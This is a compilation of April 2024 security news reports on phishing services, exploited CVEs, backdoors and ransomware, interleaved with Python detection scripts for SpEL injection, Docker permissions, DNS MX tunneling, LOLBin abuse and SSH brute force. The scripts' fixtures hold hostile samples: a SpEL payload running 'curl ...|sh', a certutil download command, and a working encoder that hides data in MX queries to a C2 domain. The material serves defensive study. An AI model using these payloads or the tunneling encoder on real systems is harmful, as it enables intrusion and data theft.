LabHost was documented earlier this year by Fortra, detailing its PhaaS targeting popular brands globally for anywhere between $179 to $300 per month. It first emerged in the fourth quarter of 2021, coinciding with the availability of another PhaaS service called Frappo.
"LabHost divides their available phishing kits between two separate subscription packages: a North American membership covering U.S. and Canadian brands, and an international membership consisting of various global brands (and excluding the NA brands)," the company said.
According to Trend Micro, LabHost also provided phishing pages for Spotify, postal services such as DHL and An Post, car toll services, and insurance providers, besides allowing customers to request the creation of bespoke phishing pages for target brands.
"Since the platform takes care of most of the tedious tasks in developing and managing phishing page infrastructure, all the malicious actor needs is a virtual private server (VPS) to host the files and from which the platform can automatically deploy," Trend Micro said.
The phishing pages – links to which are distributed via phishing and smishing campaigns – are designed to mimic banks, government entities, and other major organizations, deceiving users into entering their credentials and two-factor authentication (2FA) codes.
Customers of the phishing kit, which comprises the infrastructure to host the fraudulent websites as well as email and SMS content generation services, could then use the stolen information to take control of the online accounts and make unauthorized fund transfers from victims' bank accounts.
The captured information encompassed names and addresses, emails, dates of birth, standard security question answers, card numbers, passwords, and PINs.
"Labhost offered a menu of over 170 fake websites providing convincing phishing pages for its users to choose from," Europol said, adding law enforcement agencies from 19 countries participated in the disruption.
"What made LabHost particularly destructive was its integrated campaign management tool named LabRat. This feature allowed cybercriminals deploying the attacks to monitor and control those attacks in real time. LabRat was designed to capture two-factor authentication codes and credentials, allowing the criminals to bypass enhanced security measures."
LabHost's phishing infrastructure is estimated to include more than 40,000 domains. More than 94,000 victims have been identified in Australia and approximately 70,000 U.K. victims have been found to have entered their details in one of the bogus sites.
The U.K. Metropolitan Police said LabHost has received about £1 million ($1,173,000) in payments from criminal users since its launch. The service is estimated to have obtained 480,000 card numbers, 64,000 PIN numbers, as well as no less than one million passwords used for websites and other online services.
PhaaS platforms like LabHost lower the barrier for entry into the world of cybercrime, permitting aspiring and unskilled threat actors to mount phishing attacks at scale. In other words, a PhaaS makes it possible to outsource the need to develop and host phishing pages.
"LabHost is yet another example of the borderless nature of cybercrime and the takedown reinforces the powerful outcomes that can be achieved through a united, global law enforcement front," said AFP Acting Assistant Commissioner Cyber Command Chris Goldsmid.
The development comes as Europol revealed that organized criminal networks are increasingly agile, borderless, controlling, and destructive (ABCD), underscoring the need for a "concerted, sustained, multilateral response and joint cooperation."
Hackers Exploit OpenMetadata Flaws to Mine Crypto on Kubernetes
18.4.24
Exploit
The Hacker News
Threat actors are actively exploiting critical vulnerabilities in OpenMetadata to gain unauthorized access to Kubernetes workloads and leverage them for cryptocurrency mining activity.
That's according to the Microsoft Threat Intelligence team, which said the flaws have been weaponized since the start of April 2024.
OpenMetadata is an open-source platform that operates as a metadata management tool, offering a unified solution for data asset discovery, observability, and governance.
The flaws in question – all discovered and credited to security researcher Alvaro Muñoz – are listed below -
CVE-2024-28847 (CVSS score: 8.8) - A Spring Expression Language (SpEL) injection vulnerability in PUT /api/v1/events/subscriptions (fixed in version 1.2.4)
CVE-2024-28848 (CVSS score: 8.8) - A SpEL injection vulnerability in GET /api/v1/policies/validation/condition/<expr> (fixed in version 1.2.4)
CVE-2024-28253 (CVSS score: 8.8) - A SpEL injection vulnerability in PUT /api/v1/policies (fixed in version 1.3.1)
CVE-2024-28254 (CVSS score: 8.8) - A SpEL injection vulnerability in GET /api/v1/events/subscriptions/validation/condition/<expr> (fixed in version 1.2.4)
CVE-2024-28255 (CVSS score: 9.8) - An authentication bypass vulnerability (fixed in version 1.2.4)
Successful exploitation of the vulnerabilities could allow a threat actor to bypass authentication and achieve remote code execution.
The modus operandi uncovered by Microsoft entails the targeting of internet-exposed OpenMetadata workloads that have been left unpatched to gain code execution on the container running the OpenMetadata image.
Upon gaining an initial foothold, the threat actors have been observed carrying out reconnaissance activities to determine their level of access to the compromised environment and gather details about the network and hardware configuration, operating system version, the number of active users, and the environment variables.
"This reconnaissance step often involves contacting a publicly available service," security researchers Hagai Ran Kestenberg and Yossi Weizman said.
"In this specific attack, the attackers send ping requests to domains that end with oast[.]me and oast[.]pro, which are associated with Interactsh, an open-source tool for detecting out-of-band interactions."
In doing so, the idea is to validate network connectivity from the infiltrated system to attacker-controlled infrastructure without raising any red flags, thereby giving threat actors the confidence to establish command-and-control (C2) communications and deploy additional payloads.
The end goal of the attacks is to retrieve and deploy a Windows or Linux variant of the crypto-mining malware from a remote server located in China, depending on the operating system.
Once the miner is launched, the initial payloads are removed from the workload, and the attackers initiate a reverse shell for their remote server using the Netcat tool, permitting them to commandeer the system. Persistence is achieved by setting cron jobs to run the malicious code at predefined intervals.
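The two observable stages of this chain, the SpEL expression reaching one of the four injection sinks and the Interactsh beacon that follows, can both be hunted for in logs. The following is an added example written for this page, not Microsoft's or OpenMetadata's code. It assumes a request log that retains method, path and (for the PUT routes) body, a resolver log in a simple "timestamp client qname qtype" layout, and constructed sample records; the SpEL patterns are this example's own heuristics.

```python
import re
from urllib.parse import unquote

# Method/path prefixes of the four SpEL injection sinks listed above
# (CVE-2024-28847, -28848, -28253, -28254). <expr> rides in the path for the GET
# routes and in the JSON body for the PUT routes.
SPEL_SINKS = (
    ("PUT", "/api/v1/events/subscriptions"),
    ("GET", "/api/v1/policies/validation/condition/"),
    ("PUT", "/api/v1/policies"),
    ("GET", "/api/v1/events/subscriptions/validation/condition/"),
)

# SpEL constructs a rule condition never needs: type references, constructor
# calls, Runtime/ProcessBuilder access. Case-sensitive, as SpEL identifiers are.
SPEL_ABUSE = re.compile(r"T\s*\(|new\s+java\.|getRuntime\s*\(|ProcessBuilder|\.exec\s*\(")

# Interactsh zones the report says were contacted after the foothold.
OAST_ZONES = ("oast.me", "oast.pro")


def is_spel_sink(method: str, path: str) -> bool:
    return any(method == m and path.startswith(prefix) for m, prefix in SPEL_SINKS)


def find_spel_injection(requests):
    """requests: dicts with src, method, path and optional body (constructed format,
    e.g. from an ingress or WAF log that keeps request bodies). Returns one finding
    per request whose sink route carries a suspicious SpEL construct."""
    findings = []
    for r in requests:
        path = unquote(r["path"]).split("?", 1)[0]     # decode %xx, drop query string
        if not is_spel_sink(r["method"], path):
            continue
        m = SPEL_ABUSE.search(path + " " + unquote(r.get("body", "")))
        if m:
            findings.append({"src": r["src"], "method": r["method"],
                             "path": path, "construct": m.group(0)})
    return findings


def find_oast_beacons(dns_lines):
    """dns_lines: 'timestamp client qname qtype' (constructed format). Returns
    (client, qname) pairs resolving under an Interactsh zone."""
    beacons = []
    for line in dns_lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        _ts, client, qname, _qtype = parts[:4]
        name = qname.rstrip(".").lower()
        if name in OAST_ZONES or name.endswith(tuple("." + z for z in OAST_ZONES)):
            beacons.append((client, name))
    return beacons


# Constructed sample traffic: two injection attempts from one source, one benign
# policy-condition check, one unrelated API call.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "method": "GET",
     "path": "/api/v1/policies/validation/condition/T(java.lang.Runtime).getRuntime().exec(%27id%27)"},
    {"src": "203.0.113.7", "method": "PUT", "path": "/api/v1/policies",
     "body": '{"name":"p0","rules":[{"condition":"T(java.lang.Runtime).getRuntime().exec(\'curl 203.0.113.9/x.sh|sh\')"}]}'},
    {"src": "198.51.100.4", "method": "GET",
     "path": "/api/v1/policies/validation/condition/isOwner()"},
    {"src": "198.51.100.4", "method": "GET", "path": "/api/v1/tables?limit=10"},
]

# Constructed resolver log: one pod checks both Interactsh zones, another pulls an image.
SAMPLE_DNS = [
    "2024-04-02T10:14:03Z 10.42.0.17 cg3k8l2p9vtq1.oast.me A",
    "2024-04-02T10:14:05Z 10.42.0.17 cg3k8l2p9vtq1.oast.pro A",
    "2024-04-02T10:14:09Z 10.42.0.22 registry-1.docker.io A",
]

if __name__ == "__main__":
    for f in find_spel_injection(SAMPLE_REQUESTS):
        print("SpEL injection:", f)
    for client, name in find_oast_beacons(SAMPLE_DNS):
        print("OAST beacon:", client, "->", name)
```

The GET sinks are visible in any access log because the expression is in the path; the PUT sinks only show up where bodies are retained, so the body check is best placed in a WAF or an ingress with request-body logging. A beacon to an OAST zone from a workload that has no business doing egress DNS is worth an alert on its own, independent of the request-side match.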
Interestingly, the threat actor also leaves behind a personal note saying that they are poor and need the money to buy a car and a suite. "I don't want to do anything illegal," the note reads.
OpenMetadata users are advised to switch to strong authentication methods, avoid using default credentials, and update their images to the latest version.
"This attack serves as a valuable reminder of why it's crucial to stay compliant and run fully patched workloads in containerized environments," the researchers said.
The development comes as publicly accessible Redis servers that have the authentication feature disabled or have unpatched flaws are being targeted to install Metasploit Meterpreter payloads for post-exploitation.
"When Metasploit is installed, the threat actor can take control of the infected system and also dominate the internal network of an organization using the various features offered by the malware," the AhnLab Security Intelligence Center (ASEC) said.
It also follows a report from WithSecure that detailed how search permissions on Docker directories could be abused to achieve privilege escalation. It's worth pointing out that the issue (CVE-2021-41091, CVSS score: 6.3) was previously flagged by CyberArk in February 2022, and addressed by Docker in version 20.10.9.
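The condition behind CVE-2021-41091 is a plain permission check: can an unprivileged local user traverse from the Docker data root down to a container's rootfs? The script below is an added example written for this page, not WithSecure's or Docker's tooling. It builds two constructed data roots under a temporary directory, one with the other-execute (search) bit set on the root as pre-20.10.9 installs had it, one with that bit stripped, and reports how many container rootfs directories remain reachable; the overlay2/<id>/merged layout and the child-directory modes are assumed for the demo.

```python
import os
import stat
import tempfile

# Default Docker data root, for pointing the audit at a real host; the demo
# below builds its own tree instead of touching it.
DOCKER_ROOT = "/var/lib/docker"


def other_has_search_bit(path: str) -> bool:
    """True if 'other' holds the execute (search) bit on a directory, which lets any
    local user traverse into it even without read permission on it."""
    st = os.stat(path)
    return stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_IXOTH)


def reachable_by_other(target: str, data_root: str) -> bool:
    """True if every directory from data_root down to target grants 'other' the
    search bit, i.e. an unprivileged user can reach target. Directories above
    data_root (e.g. /var/lib) are assumed traversable, as they normally are."""
    p = os.path.abspath(target)
    root = os.path.abspath(data_root)
    while True:
        if not other_has_search_bit(p):
            return False
        if p == root:
            return True
        parent = os.path.dirname(p)
        if parent == p:            # reached the filesystem root: target is not under data_root
            return False
        p = parent


def exposed_container_roots(data_root: str):
    """List overlay2 'merged' directories (container rootfs mount points) that an
    unprivileged user could traverse into."""
    overlay = os.path.join(data_root, "overlay2")
    if not os.path.isdir(overlay):
        return []
    exposed = []
    for layer in sorted(os.listdir(overlay)):
        merged = os.path.join(overlay, layer, "merged")
        if os.path.isdir(merged) and reachable_by_other(merged, data_root):
            exposed.append(merged)
    return exposed


def demo():
    """Constructed trees: 'vulnerable' keeps the search bit for other on the data
    root (mode 0711); 'fixed' strips it (mode 0710). Child directories are given
    mode 0711, matching the 'child directories' condition WithSecure describes."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, root_mode in (("vulnerable", 0o711), ("fixed", 0o710)):
            root = os.path.join(tmp, name, "docker")
            merged = os.path.join(root, "overlay2", "c0ffee", "merged")
            os.makedirs(merged)
            for d in (os.path.join(root, "overlay2"), os.path.dirname(merged), merged):
                os.chmod(d, 0o711)
            os.chmod(root, root_mode)
            results[name] = len(exposed_container_roots(root))
    return results


if __name__ == "__main__":
    print(demo())
    if os.path.isdir(DOCKER_ROOT):
        print("exposed on this host:", exposed_container_roots(DOCKER_ROOT))
```

Stripping the search bit on the data root alone is enough to break the chain, which is why the check walks upward from the target rather than listing every directory's mode: a single non-traversable ancestor closes the path regardless of what sits below it.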
"The setting of the searchable bit for other users on /var/lib/docker/ and child directories can allow for a low-privileged attacker to gain access to various containers' filesystems," WithSecure said.
Malicious Google Ads Pushing Fake IP Scanner Software with Hidden Backdoor
18.4.24
Virus
The Hacker News
A new Google malvertising campaign is leveraging a cluster of domains mimicking a legitimate IP scanner software to deliver a previously unknown backdoor dubbed MadMxShell.
"The threat actor registered multiple look-alike domains using a typosquatting technique and leveraged Google Ads to push these domains to the top of search engine results targeting specific search keywords, thereby luring victims to visit these sites," Zscaler ThreatLabz researchers Roy Tay and Sudeep Singh said.
As many as 45 domains are said to have been registered between November 2023 and March 2024, with the sites masquerading as port scanning and IT management software such as Advanced IP Scanner, Angry IP Scanner, IP scanner PRTG, and ManageEngine.
While this is not the first time threat actors are banking on malvertising techniques to serve malware via lookalike sites, the development marks the first time the delivery vehicle is being used to propagate a sophisticated Windows backdoor.
Thus, users who end up searching for such tools are displayed bogus sites that include JavaScript code designed to download a malicious file ("Advanced-ip-scanner.zip") upon clicking the download button.
Present within the ZIP archive is a DLL file ("IVIEWERS.dll") and an executable ("Advanced-ip-scanner.exe"), the latter of which uses DLL side-loading to load the DLL and activate the infection sequence.
The DLL file is responsible for injecting the shellcode into the "Advanced-ip-scanner.exe" process via a technique called process hollowing, following which the injected EXE file unpacks two additional files – OneDrive.exe and Secur32.dll.
OneDrive.exe, a legitimate signed Microsoft binary, is then abused to sideload Secur32.dll, and ultimately execute the shellcode backdoor, but not before setting up persistence on the host by means of a scheduled task and disabling Microsoft Defender Antivirus.
The backdoor – so named for its use of DNS MX queries for command-and-control (C2) – is designed to gather system information, run commands via cmd.exe, and perform basic file manipulation operations such as reading, writing, and deleting files.
It sends requests to the C2 server ("litterbolo[.]com") by encoding the data in the subdomain(s) of the Fully Qualified Domain Name (FQDN) in a DNS mail exchange (MX) query packet and receives commands encoded within the response packet.
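MX-based tunneling stands out in resolver logs because a host that is not a mail server has no reason to issue many distinct MX queries, let alone for long, high-entropy subdomains of one apex. The following is an added example written for this page, not Zscaler's analysis or the backdoor's code: it shows one plausible way to pack bytes into the labels of a query name (the backdoor's real framing is not described in the report) and a detector that groups MX queries per client and apex. The log layout and the sample lines are constructed.

```python
import base64
import math
from collections import defaultdict

ZONE = "litterbolo.com"   # C2 apex named in the report, used here as the tunnel zone


def encode_to_qname(data: bytes, zone: str, max_label: int = 63) -> str:
    """Pack bytes into a query name: base32 (lowercase, unpadded), split into DNS
    labels of at most 63 bytes, prefixed to the attacker's zone. Illustrative
    encoding, not the backdoor's own."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [b32[i:i + max_label] for i in range(0, len(b32), max_label)]
    qname = ".".join(labels + [zone])
    if len(qname) > 253:
        raise ValueError("payload does not fit in one query name")
    return qname


def decode_from_qname(qname: str, zone: str) -> bytes:
    sub = qname[: -len(zone) - 1].replace(".", "").upper()
    return base64.b32decode(sub + "=" * (-len(sub) % 8))


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def find_mx_tunnels(log_lines, min_unique=5, min_len=20, min_entropy=2.5):
    """log_lines: 'timestamp client qtype qname' (constructed format). Groups MX
    queries by (client, apex) and flags apexes receiving many distinct, long,
    high-entropy subdomains: data riding in the qname rather than mail routing."""
    groups = defaultdict(set)
    for line in log_lines:
        parts = line.split()
        if len(parts) != 4 or parts[2] != "MX":
            continue
        labels = parts[3].rstrip(".").lower().split(".")
        if len(labels) < 3:                 # apex MX lookups carry no subdomain
            continue
        groups[(parts[1], ".".join(labels[-2:]))].add(".".join(labels[:-2]))
    findings = []
    for (client, zone), subs in groups.items():
        flat = [s.replace(".", "") for s in subs]
        avg_len = sum(map(len, flat)) / len(flat)
        avg_ent = sum(map(shannon_entropy, flat)) / len(flat)
        if len(subs) >= min_unique and avg_len >= min_len and avg_ent >= min_entropy:
            findings.append({"client": client, "zone": zone, "unique": len(subs),
                             "avg_len": round(avg_len, 1), "avg_entropy": round(avg_ent, 2)})
    return findings


def build_sample_log():
    """Constructed resolver log: ordinary mail lookups from one host, six tunnel
    beacons from another."""
    lines = ["2024-03-12T09:00:00Z 10.0.0.5 MX example.com",
             "2024-03-12T09:00:01Z 10.0.0.5 MX mail.example.com",
             "2024-03-12T09:00:02Z 10.0.0.5 A www.example.com"]
    for i in range(6):
        beacon = f"host=WS-0421;user=alice;seq={i}".encode()
        lines.append(f"2024-03-12T09:01:{i:02d}Z 10.0.0.9 MX {encode_to_qname(beacon, ZONE)}")
    return lines


if __name__ == "__main__":
    for finding in find_mx_tunnels(build_sample_log()):
        print(finding)
```

The apex heuristic (last two labels) is deliberately simple and will misgroup names under public suffixes such as co.uk; a production version should use a public-suffix list. Thresholds are starting points: mail gateways legitimately issue many MX queries, but for different apexes with short, dictionary-like subdomains, which is exactly what the per-apex grouping and the entropy term separate out.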
"The backdoor uses techniques such as multiple stages of DLL side-loading and DNS tunneling for command-and-control (C2) communication as a means to evade endpoint and network security solutions, respectively," Tay and Singh said.
"In addition, the backdoor uses evasive techniques like anti-dumping to prevent memory analysis and hinder forensics security solutions."
There is currently no indication of where the malware operators originate from or what their intentions are, but Zscaler said it identified two accounts created by them on criminal underground forums like blackhatworld[.]com and social-eng[.]ru using the email address wh8842480@gmail[.]com, which was also used to register a domain spoofing Advanced IP Scanner.
Specifically, the threat actor has been found engaging in posts offering ways to set up unlimited Google AdSense threshold accounts way back in June 2023, indicating their interest in launching their own long-lasting malvertising campaign.
"Google Ads threshold accounts and techniques for abusing them are often traded on BlackHat forums," the researchers said. "Many times they offer a way for the threat actor to add as many credits as possible to run Google Ads campaigns."
"This allows the threat actors to run campaigns without actually paying until the threshold limit. A reasonably high threshold limit lets the threat actor run the ad campaign for a significant amount of time."
Russian APT Deploys New 'Kapeka' Backdoor in Eastern European Attacks
18.4.24
APT
The Hacker News
A previously undocumented "flexible" backdoor called Kapeka has been "sporadically" observed in cyber attacks targeting Eastern Europe, including Estonia and Ukraine, since at least mid-2022.
The findings come from Finnish cybersecurity firm WithSecure, which attributed the malware to the Russia-linked advanced persistent threat (APT) group tracked as Sandworm (aka APT44 or Seashell Blizzard). Microsoft is tracking the same malware under the name KnuckleTouch.
"The malware [...] is a flexible backdoor with all the necessary functionalities to serve as an early-stage toolkit for its operators, and also to provide long-term access to the victim estate," security researcher Mohammad Kazem Hassan Nejad said.
Kapeka comes fitted with a dropper that's designed to launch and execute a backdoor component on the infected host, after which it removes itself. The dropper is also responsible for setting up persistence for the backdoor either as a scheduled task or autorun registry, depending on whether the process has SYSTEM privileges.
Microsoft, in its own advisory released in February 2024, described Kapeka as involved in multiple campaigns distributing ransomware and that it can be used to carry out a variety of functions, such as stealing credentials and other data, conducting destructive attacks, and granting threat actors remote access to the device.
The backdoor is a Windows DLL written in C++ and features an embedded command-and-control (C2) configuration that's used to establish contact with an actor-controlled server and holds information about the frequency at which the server needs to be polled in order to retrieve commands.
Besides masquerading as a Microsoft Word add-in to make it appear genuine, the backdoor DLL gathers information about the compromised host and implements multi-threading to fetch incoming instructions, process them, and exfiltrate the results of the execution to the C2 server.
"The backdoor uses WinHttp 5.1 COM interface (winhttpcom.dll) to implement its network communication component," Nejad explained. "The backdoor communicates with its C2 to poll for tasks and to send back fingerprinted information and task results. The backdoor utilizes JSON to send and receive information from its C2."
The implant is also capable of updating its C2 configuration on-the-fly by receiving a new version from the C2 server during polling. Some of the main features of the backdoor allow it to read and write files from and to disk, launch payloads, execute shell commands, and even upgrade and uninstall itself.
The exact method through which the malware is propagated is currently unknown. However, Microsoft noted that the dropper is retrieved from compromised websites using the certutil utility, underscoring the use of a legitimate living-off-the-land binary (LOLBin) to orchestrate the attack.
Kapeka's connections to Sandworm come from conceptual and configuration overlaps with previously disclosed families like GreyEnergy, a likely successor to the BlackEnergy toolkit, and Prestige.
"It is likely that Kapeka was used in intrusions that led to the deployment of Prestige ransomware in late 2022," WithSecure said. "It is probable that Kapeka is a successor to GreyEnergy, which itself was likely a replacement for BlackEnergy in Sandworm's arsenal."
"The backdoor's victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin."
Critical Atlassian Flaw Exploited to Deploy Linux Variant of Cerber Ransomware
17.4.24
Ransom
The Hacker News
Threat actors are exploiting unpatched Atlassian servers to deploy a Linux variant of Cerber (aka C3RB3R) ransomware.
The attacks leverage CVE-2023-22518 (CVSS score: 9.1), a critical security vulnerability impacting the Atlassian Confluence Data Center and Server that allows an unauthenticated attacker to reset Confluence and create an administrator account.
Armed with this access, a threat actor could take over affected systems, leading to a full loss of confidentiality, integrity, and availability.
According to cloud security firm Cado, financially motivated cybercrime groups have been observed abusing the newly created admin account to install the Effluence web shell plugin and allow for the execution of arbitrary commands on the host.
"The attacker uses this web shell to download and run the primary Cerber payload," Nate Bill, threat intelligence engineer at Cado, said in a report shared with The Hacker News.
"In a default install, the Confluence application is executed as the 'confluence' user, a low privilege user. As such, the data the ransomware is able to encrypt is limited to files owned by the confluence user."
It's worth noting that the exploitation of CVE-2023-22518 to deploy Cerber ransomware was previously highlighted by Rapid7 in November 2023.
Written in C++, the primary payload acts as a loader for additional C++-based malware by retrieving them from a command-and-control (C2) server and then erasing its own presence from the infected host.
It includes "agttydck.bat," which is executed to download the encryptor ("agttydcb.bat") that's subsequently launched by the primary payload.
It's suspected that agttydck functions akin to a permission checker for the malware, assessing its ability to write to a /tmp/ck.log file. The exact purpose of this check is unclear.
The encryptor, on the other hand, traverses the root directory and encrypts all contents with a .L0CK3D extension. It also drops a ransom note in each directory. However, no data exfiltration takes place despite claims to the contrary in the note.
The most interesting aspect of the attacks is the use of pure C++ payloads, which are becoming something of a rarity given the shift to cross-platform programming languages like Golang and Rust.
"Cerber is a relatively sophisticated, albeit aging, ransomware payload," Bill said. "While the use of the Confluence vulnerability allows it to compromise a large amount of likely high value systems, often the data it is able to encrypt will be limited to just the confluence data and in well configured systems this will be backed up."
"This greatly limits the efficacy of the ransomware in extracting money from victims, as there is much less incentive to pay up," the researcher added.
The development comes amid the emergence of new ransomware families like Evil Ant, HelloFire, L00KUPRU (an Xorist ransomware variant), Muliaka (based on the leaked Conti ransomware code), Napoli (a Chaos ransomware variant), Red CryptoApp, Risen, and SEXi (based on the leaked Babuk ransomware code) that have been spotted targeting Windows and VMware ESXi servers.
Ransomware actors are also leveraging the leaked LockBit ransomware source code to spawn their own custom variants like Lambda (aka Synapse), Mordor, and Zgut, according to reports from F.A.C.C.T. and Kaspersky.
The latter's analysis of the leaked LockBit 3.0 builder files has revealed the "alarming simplicity" with which attackers can craft bespoke ransomware and augment their capabilities with more potent features.
Kaspersky said it uncovered a tailored version with the ability to spread across the network via PsExec by taking advantage of stolen administrator credentials and performing malicious activities, such as terminating Microsoft Defender Antivirus and erasing Windows Event Logs in order to encrypt the data and cover its tracks.
"This underscores the need for robust security measures capable of mitigating this kind of threat effectively, as well as adoption of a cybersecurity culture among employees," the company said.
Hackers Exploit Fortinet Flaw, Deploy ScreenConnect, Metasploit in New Campaign
17.4.24
Vulnerebility
The Hacker News
Cybersecurity researchers have discovered a new campaign that's exploiting a recently disclosed security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.
The activity entails the exploitation of CVE-2023-48788 (CVSS score: 9.3), a critical SQL injection flaw that could permit an unauthenticated attacker to execute unauthorized code or commands via specifically crafted requests.
Cybersecurity firm Forescout is tracking the campaign under the codename Connect:fun owing to the use of ScreenConnect and Powerfun for post-exploitation.
The intrusion targeted an unnamed media company that had its vulnerable FortiClient EMS device exposed to the internet shortly after the release of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.
Over the next couple of days, the unknown adversary was observed leveraging the flaw in unsuccessful attempts to download ScreenConnect and then install the remote desktop software using the msiexec utility.
However, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit's Powerfun script and initiated a reverse connection to another IP address.
Also detected were SQL statements designed to download ScreenConnect from a remote domain ("ursketz[.]com") using certutil, which was then installed via msiexec before establishing connections with a command-and-control (C2) server.
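Two of the articles above, the Kapeka report (dropper fetched with certutil) and this Connect:fun campaign (certutil download followed by an msiexec install), turn on the same living-off-the-land pattern, so one detection serves both. The script below is an added example written for this page, not Forescout's, WithSecure's or any vendor's detection content. It triages constructed process-creation events (timestamp, host, parent image, command line) with this example's own regexes; the "odd parent" list is a heuristic, with sqlservr.exe included because the FortiClient EMS path is a SQL injection and winword.exe because Kapeka poses as a Word add-in.

```python
import re

# Command-line heuristics for the two LOLBins named in the reports above.
RULES = {
    "certutil_url_fetch": re.compile(
        r"\bcertutil(?:\.exe)?\b.*?-(?:urlcache|verifyctl)\b.*?https?://", re.I),
    "msiexec_remote_package": re.compile(
        r"\bmsiexec(?:\.exe)?\b.*?/(?:i|package)\s+\"?https?://", re.I),
    "msiexec_install_from_temp": re.compile(
        r"\bmsiexec(?:\.exe)?\b.*?/(?:i|package)\s+\"?[a-z]:\\"
        r"(?:windows\\temp|users\\[^\\]+\\appdata\\local\\temp|programdata)\\", re.I),
}

# Parents that should not normally spawn downloaders or installers (heuristic).
ODD_PARENTS = {"sqlservr.exe", "winword.exe", "excel.exe", "outlook.exe"}


def match_rules(cmdline: str):
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def triage(events):
    """events: dicts with ts, host, parent, cmdline (constructed format). Returns
    one finding per event that trips at least one rule, with parent context."""
    findings = []
    for ev in events:
        hits = match_rules(ev["cmdline"])
        if hits:
            findings.append({"ts": ev["ts"], "host": ev["host"], "parent": ev["parent"],
                             "rules": hits, "odd_parent": ev["parent"].lower() in ODD_PARENTS})
    return findings


# Constructed sample: a download-then-install pair out of SQL Server, two benign
# uses of the same binaries, and a fetch launched from Word.
SAMPLE_EVENTS = [
    {"ts": "2024-03-25T14:02:11Z", "host": "EMS01", "parent": "sqlservr.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://ursketz[.]com/sc.msi C:\Windows\Temp\sc.msi"},
    {"ts": "2024-03-25T14:02:40Z", "host": "EMS01", "parent": "cmd.exe",
     "cmdline": r"msiexec.exe /i C:\Windows\Temp\sc.msi /quiet /norestart"},
    {"ts": "2024-03-25T15:10:02Z", "host": "WS17", "parent": "explorer.exe",
     "cmdline": r"certutil.exe -hashfile C:\Users\bob\Downloads\setup.exe SHA256"},
    {"ts": "2024-03-25T15:12:30Z", "host": "WS17", "parent": "services.exe",
     "cmdline": r'msiexec.exe /i "C:\Program Files\Vendor\agent.msi" /qn'},
    {"ts": "2024-03-25T16:01:55Z", "host": "WS22", "parent": "winword.exe",
     "cmdline": r"certutil -urlcache -f https://203.0.113.8/files/update.dat C:\Users\Public\update.dat"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

The rules are deliberately narrow: certutil is flagged only when a URL-fetching switch and a URL appear together, and msiexec only when the package is remote or sits in a scratch directory, so routine hashing and vendor installs from Program Files pass. Parent context is reported rather than used to suppress, because a benign parent does not make a certutil download from an attacker domain benign.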
There is evidence to suggest that the threat actor behind it has been active since at least 2022, specifically singling out Fortinet appliances and using Vietnamese and German languages in their infrastructure.
"The observed activity clearly has a manual component evidenced by all the failed attempts to download and install tools, as well as the relatively long time taken between attempts," security researcher Sai Molige said.
"This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances."
Forescout said the attack shares tactical and infrastructure overlaps with other incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that involve the abuse of CVE-2023-48788 to download ScreenConnect and Atera.
Organizations are recommended to apply patches provided by Fortinet to address potential threats, monitor for suspicious traffic, and use a web application firewall (WAF) to block potentially malicious requests.
Cisco Warns of Global Surge in Brute-Force Attacks Targeting VPN and SSH Services
17.4.24
Hacking
The Hacker News
Cisco is warning about a global surge in brute-force attacks targeting various devices, including Virtual Private Network (VPN) services, web application authentication interfaces, and SSH services, since at least March 18, 2024.
"These attacks all appear to be originating from TOR exit nodes and a range of other anonymizing tunnels and proxies," Cisco Talos said.
Successful attacks could pave the way for unauthorized network access, account lockouts, or denial-of-service conditions, the cybersecurity company added.
The attacks, said to be broad and opportunistic, have been observed targeting the below devices -
Cisco Secure Firewall VPN
Checkpoint VPN
Fortinet VPN
SonicWall VPN
RD Web Services
Mikrotik
Draytek
Ubiquiti
Cisco Talos described the brute-forcing attempts as using both generic and valid usernames for specific organizations, with the attacks indiscriminately targeting a wide range of sectors across geographies.
The source IP addresses for the traffic are commonly associated with proxy services. This includes TOR, VPN Gate, IPIDEA Proxy, BigMama Proxy, Space Proxies, Nexus Proxy, and Proxy Rack, among others.
The complete list of indicators associated with the activity, such as the IP addresses and the usernames/passwords, can be accessed here.
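Two details in the Talos description drive triage: whether the usernames being tried are generic or real accounts at the organization, and whether the source sits behind an anonymizer. The script below is an added example written for this page, not Talos content. It summarizes constructed sshd "Failed password" lines per source address, distinguishing attempts against non-existent accounts ("invalid user") from attempts against real ones, and checks sources against a constructed stand-in for the Tor-exit and proxy indicators Talos published; thresholds are this example's own.

```python
import re
from collections import defaultdict

# sshd failure lines; "invalid user" marks names that do not exist on the host,
# so its absence means the attacker is trying a real account.
SSHD_FAIL = re.compile(
    r"sshd\[\d+\]: Failed password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+")

# Constructed stand-in for a Tor-exit / proxy feed; documentation-range addresses.
ANONYMIZER_IPS = {"203.0.113.10", "203.0.113.11"}


def summarize_failures(lines):
    """Per-source counters: total failures, failures against non-existent vs real
    accounts, and the set of usernames tried."""
    per_ip = defaultdict(lambda: {"total": 0, "invalid": 0, "valid": 0, "users": set()})
    for line in lines:
        m = SSHD_FAIL.search(line)
        if not m:
            continue
        rec = per_ip[m["ip"]]
        rec["total"] += 1
        rec["invalid" if m["invalid"] else "valid"] += 1
        rec["users"].add(m["user"])
    return per_ip


def flag_sources(lines, min_failures=5, min_users=3):
    """Flag sources that fail often or cycle through usernames; report how many
    attempts hit real accounts and whether the source is a known anonymizer."""
    findings = []
    for ip, rec in summarize_failures(lines).items():
        reasons = []
        if rec["total"] >= min_failures:
            reasons.append(f"{rec['total']} failures")
        if len(rec["users"]) >= min_users:
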